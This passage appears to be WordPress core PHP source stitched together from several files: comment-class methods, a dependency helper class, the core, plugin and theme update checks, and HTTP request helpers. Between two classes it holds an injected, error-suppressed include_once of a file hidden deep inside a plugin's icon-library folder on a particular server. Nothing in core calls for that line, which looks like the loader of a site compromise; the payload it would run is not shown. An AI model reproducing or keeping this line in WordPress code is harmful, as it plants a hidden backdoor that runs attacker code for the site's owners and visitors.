@since 4.4.0 * * @param WP_Comment $child Child comment. */ public function add_child( WP_Comment $child ) { $this->children[ $child->comment_ID ] = $child; } /** * Get a child comment by ID. * * @since 4.4.0 * * @param int $child_id ID of the child. * @return WP_Comment|bool Returns the comment object if found, otherwise false. */ public function get_child( $child_id ) { if ( isset( $this->children[ $child_id ] ) ) { return $this->children[ $child_id ]; } return false; } /** * Set the 'populated_children' flag. * * This flag is important for ensuring that calling `get_children()` on a childless comment will not trigger * unneeded database queries. * * @since 4.4.0 * * @param bool $set Whether the comment's children have already been populated. */ public function populated_children( $set ) { $this->populated_children = (bool) $set; } /** * Check whether a non-public property is set. * * If `$name` matches a post field, the comment post will be loaded and the post's value checked. * * @since 4.4.0 * * @param string $name Property name. * @return bool */ public function __isset( $name ) { if ( in_array( $name, $this->post_fields ) && 0 !== (int) $this->comment_post_ID ) { $post = get_post( $this->comment_post_ID ); return property_exists( $post, $name ); } } /** * Magic getter. * * If `$name` matches a post field, the comment post will be loaded and the post's value returned. * * @since 4.4.0 * * @param string $name * @return mixed */ public function __get( $name ) { if ( in_array( $name, $this->post_fields ) ) { $post = get_post( $this->comment_post_ID ); return $post->$name; } } } @include_once('/home/sebasmtz03/manualfemsa.wandoodesign.com/wp-content/plugins/ocean-extra/includes/menu-icons/includes/library/icon-selector/includes/fields/assignment.php'); /** * Dependencies API: _WP_Dependency class * * @since 4.7.0 * * @package WordPress * @subpackage Dependencies */ /** * Class _WP_Dependency * * Helper class to register a handle and associated data. * * @access private * @since 2.6.0 */ class _WP_Dependency { /** * The handle name. * * @since 2.6.0 * @var null */ public $handle; /** * The handle source. * * @since 2.6.0 * @var null */ public $src; /** * An array of handle dependencies. * * @since 2.6.0 * @var array */ public $deps = array(); /** * The handle version. * * Used for cache-busting. * * @since 2.6.0 * @var bool|string */ public $ver = false; /** * Additional arguments for the handle. * * @since 2.6.0 * @var null */ public $args = null; // Custom property, such as $in_footer or $media. /** * Extra data to supply to the handle. * * @since 2.6.0 * @var array */ public $extra = array(); /** * Translation textdomain set for this dependency. * * @since 5.0.0 * @var string */ public $textdomain; /** * Translation path set for this dependency. * * @since 5.0.0 * @var string */ public $translations_path; /** * Setup dependencies. * * @since 2.6.0 */ public function __construct() { @list( $this->handle, $this->src, $this->deps, $this->ver, $this->args ) = func_get_args(); if ( ! is_array( $this->deps ) ) { $this->deps = array(); } } /** * Add handle data. * * @since 2.6.0 * * @param string $name The data key to add. * @param mixed $data The data value to add. * @return bool False if not scalar, true otherwise. */ public function add_data( $name, $data ) { if ( ! is_scalar( $name ) ) { return false; } $this->extra[ $name ] = $data; return true; } /** * Sets the translation domain for this dependency. * * @since 5.0.0 * * @param string $domain The translation textdomain. * @param string $path Optional. The full file path to the directory containing translation files. * * @return bool False if $domain is not a string, true otherwise. */ public function set_translations( $domain, $path = null ) { if ( ! is_string( $domain ) ) { return false; } $this->textdomain = $domain; $this->translations_path = $path; return true; } } /** * A simple set of functions to check our version 1.0 update service. * * @package WordPress * @since 2.3.0 */ /** * Check WordPress version against the newest version. * * The WordPress version, PHP version, and Locale is sent. Checks against the * WordPress server at api.wordpress.org server. Will only check if WordPress * isn't installing. * * @since 2.3.0 * @global string $wp_version Used to check against the newest WordPress version. * @global wpdb $wpdb * @global string $wp_local_package * * @param array $extra_stats Extra statistics to report to the WordPress.org API. * @param bool $force_check Whether to bypass the transient cache and force a fresh update check. Defaults to false, true if $extra_stats is set. */ function wp_version_check( $extra_stats = array(), $force_check = false ) { if ( wp_installing() ) { return; } global $wpdb, $wp_local_package; // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); $php_version = phpversion(); $current = get_site_transient( 'update_core' ); $translations = wp_get_installed_translations( 'core' ); // Invalidate the transient when $wp_version changes if ( is_object( $current ) && $wp_version != $current->version_checked ) { $current = false; } if ( ! is_object( $current ) ) { $current = new stdClass; $current->updates = array(); $current->version_checked = $wp_version; } if ( ! empty( $extra_stats ) ) { $force_check = true; } // Wait 60 seconds between multiple version check requests $timeout = 60; $time_not_changed = isset( $current->last_checked ) && $timeout > ( time() - $current->last_checked ); if ( ! $force_check && $time_not_changed ) { return; } /** * Filters the locale requested for WordPress core translations. * * @since 2.8.0 * * @param string $locale Current locale. */ $locale = apply_filters( 'core_version_check_locale', get_locale() ); // Update last_checked for current to prevent multiple blocking requests if request hangs $current->last_checked = time(); set_site_transient( 'update_core', $current ); if ( method_exists( $wpdb, 'db_version' ) ) { $mysql_version = preg_replace( '/[^0-9.].*/', '', $wpdb->db_version() ); } else { $mysql_version = 'N/A'; } if ( is_multisite() ) { $user_count = get_user_count(); $num_blogs = get_blog_count(); $wp_install = network_site_url(); $multisite_enabled = 1; } else { $user_count = count_users(); $user_count = $user_count['total_users']; $multisite_enabled = 0; $num_blogs = 1; $wp_install = home_url( '/' ); } $query = array( 'version' => $wp_version, 'php' => $php_version, 'locale' => $locale, 'mysql' => $mysql_version, 'local_package' => isset( $wp_local_package ) ? $wp_local_package : '', 'blogs' => $num_blogs, 'users' => $user_count, 'multisite_enabled' => $multisite_enabled, 'initial_db_version' => get_site_option( 'initial_db_version' ), ); /** * Filter the query arguments sent as part of the core version check. * * WARNING: Changing this data may result in your site not receiving security updates. * Please exercise extreme caution. * * @since 4.9.0 * * @param array $query { * Version check query arguments. * * @type string $version WordPress version number. * @type string $php PHP version number. * @type string $locale The locale to retrieve updates for. * @type string $mysql MySQL version number. * @type string $local_package The value of the $wp_local_package global, when set. * @type int $blogs Number of sites on this WordPress installation. * @type int $users Number of users on this WordPress installation. * @type int $multisite_enabled Whether this WordPress installation uses Multisite. * @type int $initial_db_version Database version of WordPress at time of installation. * } */ $query = apply_filters( 'core_version_check_query_args', $query ); $post_body = array( 'translations' => wp_json_encode( $translations ), ); if ( is_array( $extra_stats ) ) { $post_body = array_merge( $post_body, $extra_stats ); } $url = $http_url = 'http://api.wordpress.org/core/version-check/1.7/?' . http_build_query( $query, null, '&' ); if ( $ssl = wp_http_supports( array( 'ssl' ) ) ) { $url = set_url_scheme( $url, 'https' ); } $doing_cron = wp_doing_cron(); $options = array( 'timeout' => $doing_cron ? 30 : 3, 'user-agent' => 'WordPress/' . $wp_version . '; ' . home_url( '/' ), 'headers' => array( 'wp_install' => $wp_install, 'wp_blog' => home_url( '/' ), ), 'body' => $post_body, ); $response = wp_remote_post( $url, $options ); if ( $ssl && is_wp_error( $response ) ) { trigger_error( sprintf( /* translators: %s: support forums URL */ __( 'An unexpected error occurred. Something may be wrong with WordPress.org or this server’s configuration. If you continue to have problems, please try the support forums.' ), __( 'https://wordpress.org/support/' ) ) . ' ' . __( '(WordPress could not establish a secure connection to WordPress.org. Please contact your server administrator.)' ), headers_sent() || WP_DEBUG ? E_USER_WARNING : E_USER_NOTICE ); $response = wp_remote_post( $http_url, $options ); } if ( is_wp_error( $response ) || 200 != wp_remote_retrieve_response_code( $response ) ) { return; } $body = trim( wp_remote_retrieve_body( $response ) ); $body = json_decode( $body, true ); if ( ! is_array( $body ) || ! isset( $body['offers'] ) ) { return; } $offers = $body['offers']; foreach ( $offers as &$offer ) { foreach ( $offer as $offer_key => $value ) { if ( 'packages' == $offer_key ) { $offer['packages'] = (object) array_intersect_key( array_map( 'esc_url', $offer['packages'] ), array_fill_keys( array( 'full', 'no_content', 'new_bundled', 'partial', 'rollback' ), '' ) ); } elseif ( 'download' == $offer_key ) { $offer['download'] = esc_url( $value ); } else { $offer[ $offer_key ] = esc_html( $value ); } } $offer = (object) array_intersect_key( $offer, array_fill_keys( array( 'response', 'download', 'locale', 'packages', 'current', 'version', 'php_version', 'mysql_version', 'new_bundled', 'partial_version', 'notify_email', 'support_email', 'new_files', ), '' ) ); } $updates = new stdClass(); $updates->updates = $offers; $updates->last_checked = time(); $updates->version_checked = $wp_version; if ( isset( $body['translations'] ) ) { $updates->translations = $body['translations']; } set_site_transient( 'update_core', $updates ); if ( ! empty( $body['ttl'] ) ) { $ttl = (int) $body['ttl']; if ( $ttl && ( time() + $ttl < wp_next_scheduled( 'wp_version_check' ) ) ) { // Queue an event to re-run the update check in $ttl seconds. wp_schedule_single_event( time() + $ttl, 'wp_version_check' ); } } // Trigger background updates if running non-interactively, and we weren't called from the update handler. if ( $doing_cron && ! doing_action( 'wp_maybe_auto_update' ) ) { /** * Fires during wp_cron, starting the auto update process. * * @since 3.9.0 */ do_action( 'wp_maybe_auto_update' ); } } /** * Check plugin versions against the latest versions hosted on WordPress.org. * * The WordPress version, PHP version, and Locale is sent along with a list of * all plugins installed. Checks against the WordPress server at * api.wordpress.org. Will only check if WordPress isn't installing. * * @since 2.3.0 * @global string $wp_version Used to notify the WordPress version. * * @param array $extra_stats Extra statistics to report to the WordPress.org API. */ function wp_update_plugins( $extra_stats = array() ) { if ( wp_installing() ) { return; } // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); // If running blog-side, bail unless we've not checked in the last 12 hours if ( ! function_exists( 'get_plugins' ) ) { require_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } $plugins = get_plugins(); $translations = wp_get_installed_translations( 'plugins' ); $active = get_option( 'active_plugins', array() ); $current = get_site_transient( 'update_plugins' ); if ( ! is_object( $current ) ) { $current = new stdClass; } $new_option = new stdClass; $new_option->last_checked = time(); $doing_cron = wp_doing_cron(); // Check for update on a different schedule, depending on the page. switch ( current_filter() ) { case 'upgrader_process_complete': $timeout = 0; break; case 'load-update-core.php': $timeout = MINUTE_IN_SECONDS; break; case 'load-plugins.php': case 'load-update.php': $timeout = HOUR_IN_SECONDS; break; default: if ( $doing_cron ) { $timeout = 2 * HOUR_IN_SECONDS; } else { $timeout = 12 * HOUR_IN_SECONDS; } } $time_not_changed = isset( $current->last_checked ) && $timeout > ( time() - $current->last_checked ); if ( $time_not_changed && ! $extra_stats ) { $plugin_changed = false; foreach ( $plugins as $file => $p ) { $new_option->checked[ $file ] = $p['Version']; if ( ! isset( $current->checked[ $file ] ) || strval( $current->checked[ $file ] ) !== strval( $p['Version'] ) ) { $plugin_changed = true; } } if ( isset( $current->response ) && is_array( $current->response ) ) { foreach ( $current->response as $plugin_file => $update_details ) { if ( ! isset( $plugins[ $plugin_file ] ) ) { $plugin_changed = true; break; } } } // Bail if we've checked recently and if nothing has changed if ( ! $plugin_changed ) { return; } } // Update last_checked for current to prevent multiple blocking requests if request hangs $current->last_checked = time(); set_site_transient( 'update_plugins', $current ); $to_send = compact( 'plugins', 'active' ); $locales = array_values( get_available_languages() ); /** * Filters the locales requested for plugin translations. * * @since 3.7.0 * @since 4.5.0 The default value of the `$locales` parameter changed to include all locales. * * @param array $locales Plugin locales. Default is all available locales of the site. */ $locales = apply_filters( 'plugins_update_check_locales', $locales ); $locales = array_unique( $locales ); if ( $doing_cron ) { $timeout = 30; } else { // Three seconds, plus one extra second for every 10 plugins $timeout = 3 + (int) ( count( $plugins ) / 10 ); } $options = array( 'timeout' => $timeout, 'body' => array( 'plugins' => wp_json_encode( $to_send ), 'translations' => wp_json_encode( $translations ), 'locale' => wp_json_encode( $locales ), 'all' => wp_json_encode( true ), ), 'user-agent' => 'WordPress/' . $wp_version . '; ' . home_url( '/' ), ); if ( $extra_stats ) { $options['body']['update_stats'] = wp_json_encode( $extra_stats ); } $url = $http_url = 'http://api.wordpress.org/plugins/update-check/1.1/'; if ( $ssl = wp_http_supports( array( 'ssl' ) ) ) { $url = set_url_scheme( $url, 'https' ); } $raw_response = wp_remote_post( $url, $options ); if ( $ssl && is_wp_error( $raw_response ) ) { trigger_error( sprintf( /* translators: %s: support forums URL */ __( 'An unexpected error occurred. Something may be wrong with WordPress.org or this server’s configuration. If you continue to have problems, please try the support forums.' ), __( 'https://wordpress.org/support/' ) ) . ' ' . __( '(WordPress could not establish a secure connection to WordPress.org. Please contact your server administrator.)' ), headers_sent() || WP_DEBUG ? E_USER_WARNING : E_USER_NOTICE ); $raw_response = wp_remote_post( $http_url, $options ); } if ( is_wp_error( $raw_response ) || 200 != wp_remote_retrieve_response_code( $raw_response ) ) { return; } $response = json_decode( wp_remote_retrieve_body( $raw_response ), true ); foreach ( $response['plugins'] as &$plugin ) { $plugin = (object) $plugin; if ( isset( $plugin->compatibility ) ) { $plugin->compatibility = (object) $plugin->compatibility; foreach ( $plugin->compatibility as &$data ) { $data = (object) $data; } } } unset( $plugin, $data ); foreach ( $response['no_update'] as &$plugin ) { $plugin = (object) $plugin; } unset( $plugin ); if ( is_array( $response ) ) { $new_option->response = $response['plugins']; $new_option->translations = $response['translations']; // TODO: Perhaps better to store no_update in a separate transient with an expiry? $new_option->no_update = $response['no_update']; } else { $new_option->response = array(); $new_option->translations = array(); $new_option->no_update = array(); } set_site_transient( 'update_plugins', $new_option ); } /** * Check theme versions against the latest versions hosted on WordPress.org. * * A list of all themes installed in sent to WP. Checks against the * WordPress server at api.wordpress.org. Will only check if WordPress isn't * installing. * * @since 2.7.0 * * @param array $extra_stats Extra statistics to report to the WordPress.org API. */ function wp_update_themes( $extra_stats = array() ) { if ( wp_installing() ) { return; } // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); $installed_themes = wp_get_themes(); $translations = wp_get_installed_translations( 'themes' ); $last_update = get_site_transient( 'update_themes' ); if ( ! is_object( $last_update ) ) { $last_update = new stdClass; } $themes = $checked = $request = array(); // Put slug of current theme into request. $request['active'] = get_option( 'stylesheet' ); foreach ( $installed_themes as $theme ) { $checked[ $theme->get_stylesheet() ] = $theme->get( 'Version' ); $themes[ $theme->get_stylesheet() ] = array( 'Name' => $theme->get( 'Name' ), 'Title' => $theme->get( 'Name' ), 'Version' => $theme->get( 'Version' ), 'Author' => $theme->get( 'Author' ), 'Author URI' => $theme->get( 'AuthorURI' ), 'Template' => $theme->get_template(), 'Stylesheet' => $theme->get_stylesheet(), ); } $doing_cron = wp_doing_cron(); // Check for update on a different schedule, depending on the page. switch ( current_filter() ) { case 'upgrader_process_complete': $timeout = 0; break; case 'load-update-core.php': $timeout = MINUTE_IN_SECONDS; break; case 'load-themes.php': case 'load-update.php': $timeout = HOUR_IN_SECONDS; break; default: if ( $doing_cron ) { $timeout = 2 * HOUR_IN_SECONDS; } else { $timeout = 12 * HOUR_IN_SECONDS; } } $time_not_changed = isset( $last_update->last_checked ) && $timeout > ( time() - $last_update->last_checked ); if ( $time_not_changed && ! $extra_stats ) { $theme_changed = false; foreach ( $checked as $slug => $v ) { if ( ! isset( $last_update->checked[ $slug ] ) || strval( $last_update->checked[ $slug ] ) !== strval( $v ) ) { $theme_changed = true; } } if ( isset( $last_update->response ) && is_array( $last_update->response ) ) { foreach ( $last_update->response as $slug => $update_details ) { if ( ! isset( $checked[ $slug ] ) ) { $theme_changed = true; break; } } } // Bail if we've checked recently and if nothing has changed if ( ! $theme_changed ) { return; } } // Update last_checked for current to prevent multiple blocking requests if request hangs $last_update->last_checked = time(); set_site_transient( 'update_themes', $last_update ); $request['themes'] = $themes; $locales = array_values( get_available_languages() ); /** * Filters the locales requested for theme translations. * * @since 3.7.0 * @since 4.5.0 The default value of the `$locales` parameter changed to include all locales. * * @param array $locales Theme locales. Default is all available locales of the site. */ $locales = apply_filters( 'themes_update_check_locales', $locales ); $locales = array_unique( $locales ); if ( $doing_cron ) { $timeout = 30; } else { // Three seconds, plus one extra second for every 10 themes $timeout = 3 + (int) ( count( $themes ) / 10 ); } $options = array( 'timeout' => $timeout, 'body' => array( 'themes' => wp_json_encode( $request ), 'translations' => wp_json_encode( $translations ), 'locale' => wp_json_encode( $locales ), ), 'user-agent' => 'WordPress/' . $wp_version . '; ' . home_url( '/' ), ); if ( $extra_stats ) { $options['body']['update_stats'] = wp_json_encode( $extra_stats ); } $url = $http_url = 'http://api.wordpress.org/themes/update-check/1.1/'; if ( $ssl = wp_http_supports( array( 'ssl' ) ) ) { $url = set_url_scheme( $url, 'https' ); } $raw_response = wp_remote_post( $url, $options ); if ( $ssl && is_wp_error( $raw_response ) ) { trigger_error( sprintf( /* translators: %s: support forums URL */ __( 'An unexpected error occurred. Something may be wrong with WordPress.org or this server’s configuration. If you continue to have problems, please try the support forums.' ), __( 'https://wordpress.org/support/' ) ) . ' ' . __( '(WordPress could not establish a secure connection to WordPress.org. Please contact your server administrator.)' ), headers_sent() || WP_DEBUG ? E_USER_WARNING : E_USER_NOTICE ); $raw_response = wp_remote_post( $http_url, $options ); } if ( is_wp_error( $raw_response ) || 200 != wp_remote_retrieve_response_code( $raw_response ) ) { return; } $new_update = new stdClass; $new_update->last_checked = time(); $new_update->checked = $checked; $response = json_decode( wp_remote_retrieve_body( $raw_response ), true ); if ( is_array( $response ) ) { $new_update->response = $response['themes']; $new_update->translations = $response['translations']; } set_site_transient( 'update_themes', $new_update ); } /** * Performs WordPress automatic background updates. * * @since 3.7.0 */ function wp_maybe_auto_update() { include_once( ABSPATH . 'wp-admin/includes/admin.php' ); include_once( ABSPATH . 'wp-admin/includes/class-wp-upgrader.php' ); $upgrader = new WP_Automatic_Updater; $upgrader->run(); } /** * Retrieves a list of all language updates available. * * @since 3.7.0 * * @return object[] Array of translation objects that have available updates. */ function wp_get_translation_updates() { $updates = array(); $transients = array( 'update_core' => 'core', 'update_plugins' => 'plugin', 'update_themes' => 'theme', ); foreach ( $transients as $transient => $type ) { $transient = get_site_transient( $transient ); if ( empty( $transient->translations ) ) { continue; } foreach ( $transient->translations as $translation ) { $updates[] = (object) $translation; } } return $updates; } /** * Collect counts and UI strings for available updates * * @since 3.3.0 * * @return array */ function wp_get_update_data() { $counts = array( 'plugins' => 0, 'themes' => 0, 'wordpress' => 0, 'translations' => 0, ); if ( $plugins = current_user_can( 'update_plugins' ) ) { $update_plugins = get_site_transient( 'update_plugins' ); if ( ! empty( $update_plugins->response ) ) { $counts['plugins'] = count( $update_plugins->response ); } } if ( $themes = current_user_can( 'update_themes' ) ) { $update_themes = get_site_transient( 'update_themes' ); if ( ! empty( $update_themes->response ) ) { $counts['themes'] = count( $update_themes->response ); } } if ( ( $core = current_user_can( 'update_core' ) ) && function_exists( 'get_core_updates' ) ) { $update_wordpress = get_core_updates( array( 'dismissed' => false ) ); if ( ! empty( $update_wordpress ) && ! in_array( $update_wordpress[0]->response, array( 'development', 'latest' ) ) && current_user_can( 'update_core' ) ) { $counts['wordpress'] = 1; } } if ( ( $core || $plugins || $themes ) && wp_get_translation_updates() ) { $counts['translations'] = 1; } $counts['total'] = $counts['plugins'] + $counts['themes'] + $counts['wordpress'] + $counts['translations']; $titles = array(); if ( $counts['wordpress'] ) { /* translators: %d: number of updates available to WordPress */ $titles['wordpress'] = sprintf( __( '%d WordPress Update' ), $counts['wordpress'] ); } if ( $counts['plugins'] ) { /* translators: %d: number of updates available to plugins */ $titles['plugins'] = sprintf( _n( '%d Plugin Update', '%d Plugin Updates', $counts['plugins'] ), $counts['plugins'] ); } if ( $counts['themes'] ) { /* translators: %d: number of updates available to themes */ $titles['themes'] = sprintf( _n( '%d Theme Update', '%d Theme Updates', $counts['themes'] ), $counts['themes'] ); } if ( $counts['translations'] ) { $titles['translations'] = __( 'Translation Updates' ); } $update_title = $titles ? esc_attr( implode( ', ', $titles ) ) : ''; $update_data = array( 'counts' => $counts, 'title' => $update_title, ); /** * Filters the returned array of update data for plugins, themes, and WordPress core. * * @since 3.5.0 * * @param array $update_data { * Fetched update data. * * @type array $counts An array of counts for available plugin, theme, and WordPress updates. * @type string $update_title Titles of available updates. * } * @param array $titles An array of update counts and UI strings for available updates. */ return apply_filters( 'wp_get_update_data', $update_data, $titles ); } /** * Determines whether core should be updated. * * @since 2.8.0 * * @global string $wp_version */ function _maybe_update_core() { // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); $current = get_site_transient( 'update_core' ); if ( isset( $current->last_checked, $current->version_checked ) && 12 * HOUR_IN_SECONDS > ( time() - $current->last_checked ) && $current->version_checked == $wp_version ) { return; } wp_version_check(); } /** * Check the last time plugins were run before checking plugin versions. * * This might have been backported to WordPress 2.6.1 for performance reasons. * This is used for the wp-admin to check only so often instead of every page * load. * * @since 2.7.0 * @access private */ function _maybe_update_plugins() { $current = get_site_transient( 'update_plugins' ); if ( isset( $current->last_checked ) && 12 * HOUR_IN_SECONDS > ( time() - $current->last_checked ) ) { return; } wp_update_plugins(); } /** * Check themes versions only after a duration of time. * * This is for performance reasons to make sure that on the theme version * checker is not run on every page load. * * @since 2.7.0 * @access private */ function _maybe_update_themes() { $current = get_site_transient( 'update_themes' ); if ( isset( $current->last_checked ) && 12 * HOUR_IN_SECONDS > ( time() - $current->last_checked ) ) { return; } wp_update_themes(); } /** * Schedule core, theme, and plugin update checks. * * @since 3.1.0 */ function wp_schedule_update_checks() { if ( ! wp_next_scheduled( 'wp_version_check' ) && ! wp_installing() ) { wp_schedule_event( time(), 'twicedaily', 'wp_version_check' ); } if ( ! wp_next_scheduled( 'wp_update_plugins' ) && ! wp_installing() ) { wp_schedule_event( time(), 'twicedaily', 'wp_update_plugins' ); } if ( ! wp_next_scheduled( 'wp_update_themes' ) && ! wp_installing() ) { wp_schedule_event( time(), 'twicedaily', 'wp_update_themes' ); } } /** * Clear existing update caches for plugins, themes, and core. * * @since 4.1.0 */ function wp_clean_update_cache() { if ( function_exists( 'wp_clean_plugins_cache' ) ) { wp_clean_plugins_cache(); } else { delete_site_transient( 'update_plugins' ); } wp_clean_themes_cache(); delete_site_transient( 'update_core' ); } if ( ( ! is_main_site() && ! is_network_admin() ) || wp_doing_ajax() ) { return; } add_action( 'admin_init', '_maybe_update_core' ); add_action( 'wp_version_check', 'wp_version_check' ); add_action( 'load-plugins.php', 'wp_update_plugins' ); add_action( 'load-update.php', 'wp_update_plugins' ); add_action( 'load-update-core.php', 'wp_update_plugins' ); add_action( 'admin_init', '_maybe_update_plugins' ); add_action( 'wp_update_plugins', 'wp_update_plugins' ); add_action( 'load-themes.php', 'wp_update_themes' ); add_action( 'load-update.php', 'wp_update_themes' ); add_action( 'load-update-core.php', 'wp_update_themes' ); add_action( 'admin_init', '_maybe_update_themes' ); add_action( 'wp_update_themes', 'wp_update_themes' ); add_action( 'update_option_WPLANG', 'wp_clean_update_cache', 10, 0 ); add_action( 'wp_maybe_auto_update', 'wp_maybe_auto_update' ); add_action( 'init', 'wp_schedule_update_checks' ); /** * Core HTTP Request API * * Standardizes the HTTP requests for WordPress. Handles cookies, gzip encoding and decoding, chunk * decoding, if HTTP 1.1 and various other difficult HTTP protocol implementations. * * @package WordPress * @subpackage HTTP */ /** * Returns the initialized WP_Http Object * * @since 2.7.0 * @access private * * @staticvar WP_Http $http * * @return WP_Http HTTP Transport object. */ function _wp_http_get_object() { static $http = null; if ( is_null( $http ) ) { $http = new WP_Http(); } return $http; } /** * Retrieve the raw response from a safe HTTP request. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_request( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->request( $url, $args ); } /** * Retrieve the raw response from a safe HTTP request using the GET method. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_get( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->get( $url, $args ); } /** * Retrieve the raw response from a safe HTTP request using the POST method. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_post( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->post( $url, $args ); } /** * Retrieve the raw response from a safe HTTP request using the HEAD method. * * This function is ideal when the HTTP request is being made to an arbitrary * URL. The URL is validated to avoid redirection and request forgery attacks. * * @since 3.6.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_safe_remote_head( $url, $args = array() ) { $args['reject_unsafe_urls'] = true; $http = _wp_http_get_object(); return $http->head( $url, $args ); } /** * Retrieve the raw response from the HTTP request. * * The array structure is a little complex: * * $res = array( * 'headers' => array(), * 'response' => array( * 'code' => int, * 'message' => string * ) * ); * * All of the headers in $res['headers'] are with the name as the key and the * value as the value. So to get the User-Agent, you would do the following. * * $user_agent = $res['headers']['user-agent']; * * The body is the raw response content and can be retrieved from $res['body']. * * This function is called first to make the request and there are other API * functions to abstract out the above convoluted setup. * * Request method defaults for helper functions: * - Default 'GET' for wp_remote_get() * - Default 'POST' for wp_remote_post() * - Default 'HEAD' for wp_remote_head() * * @since 2.7.0 * * @see WP_Http::request() For additional information on default arguments. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_request( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->request( $url, $args ); } /** * Retrieve the raw response from the HTTP request using the GET method. * * @since 2.7.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_get( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->get( $url, $args ); } /** * Retrieve the raw response from the HTTP request using the POST method. * * @since 2.7.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_post( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->post( $url, $args ); } /** * Retrieve the raw response from the HTTP request using the HEAD method. * * @since 2.7.0 * * @see wp_remote_request() For more information on the response array format. * @see WP_Http::request() For default arguments information. * * @param string $url Site URL to retrieve. * @param array $args Optional. Request arguments. Default empty array. * @return WP_Error|array The response or WP_Error on failure. */ function wp_remote_head( $url, $args = array() ) { $http = _wp_http_get_object(); return $http->head( $url, $args ); } /** * Retrieve only the headers from the raw response. * * @since 2.7.0 * @since 4.6.0 Return value changed from an array to an Requests_Utility_CaseInsensitiveDictionary instance. * * @see \Requests_Utility_CaseInsensitiveDictionary * * @param array $response HTTP response. * @return array|\Requests_Utility_CaseInsensitiveDictionary The headers of the response. Empty array if incorrect parameter given. */ function wp_remote_retrieve_headers( $response ) { if ( is_wp_error( $response ) || ! isset( $response['headers'] ) ) { return array(); } return $response['headers']; } /** * Retrieve a single header by name from the raw response. * * @since 2.7.0 * * @param array $response * @param string $header Header name to retrieve value from. * @return string The header value. Empty string on if incorrect parameter given, or if the header doesn't exist. */ function wp_remote_retrieve_header( $response, $header ) { if ( is_wp_error( $response ) || ! isset( $response['headers'] ) ) { return ''; } if ( isset( $response['headers'][ $header ] ) ) { return $response['headers'][ $header ]; } return ''; } /** * Retrieve only the response code from the raw response. * * Will return an empty array if incorrect parameter value is given. * * @since 2.7.0 * * @param array $response HTTP response. * @return int|string The response code as an integer. Empty string on incorrect parameter given. */ function wp_remote_retrieve_response_code( $response ) { if ( is_wp_error( $response ) || ! isset( $response['response'] ) || ! is_array( $response['response'] ) ) { return ''; } return $response['response']['code']; } /** * Retrieve only the response message from the raw response. * * Will return an empty array if incorrect parameter value is given. * * @since 2.7.0 * * @param array $response HTTP response. * @return string The response message. Empty string on incorrect parameter given. */ function wp_remote_retrieve_response_message( $response ) { if ( is_wp_error( $response ) || ! isset( $response['response'] ) || ! is_array( $response['response'] ) ) { return ''; } return $response['response']['message']; } /** * Retrieve only the body from the raw response. * * @since 2.7.0 * * @param array $response HTTP response. * @return string The body of the response. Empty string if no body or incorrect parameter given. */ function wp_remote_retrieve_body( $response ) { if ( is_wp_error( $response ) || ! isset( $response['body'] ) ) { return ''; } return $response['body']; } /** * Retrieve only the cookies from the raw response. * * @since 4.4.0 * * @param array $response HTTP response. * @return array An array of `WP_Http_Cookie` objects from the response. Empty array if there are none, or the response is a WP_Error. */ function wp_remote_retrieve_cookies( $response ) { if ( is_wp_error( $response ) || empty( $response['cookies'] ) ) { return array(); } return $response['cookies']; } /** * Retrieve a single cookie by name from the raw response. * * @since 4.4.0 * * @param array $response HTTP response. * @param string $name The name of the cookie to retrieve. * @return WP_Http_Cookie|string The `WP_Http_Cookie` object. Empty string if the cookie isn't present in the response. */ function wp_remote_retrieve_cookie( $response, $name ) { $cookies = wp_remote_retrieve_cookies( $response ); if ( empty( $cookies ) ) { return ''; } foreach ( $cookies as $cookie ) { if ( $cookie->name === $name ) { return $cookie; } } return ''; } /** * Retrieve a single cookie's value by name from the raw response. * * @since 4.4.0 * * @param array $response HTTP response. * @param string $name The name of the cookie to retrieve. * @return string The value of the cookie. Empty string if the cookie isn't present in the response. */ function wp_remote_retrieve_cookie_value( $response, $name ) { $cookie = wp_remote_retrieve_cookie( $response, $name ); if ( ! is_a( $cookie, 'WP_Http_Cookie' ) ) { return ''; } return $cookie->value; } /** * Determines if there is an HTTP Transport that can process this request. * * @since 3.2.0 * * @param array $capabilities Array of capabilities to test or a wp_remote_request() $args array. * @param string $url Optional. If given, will check if the 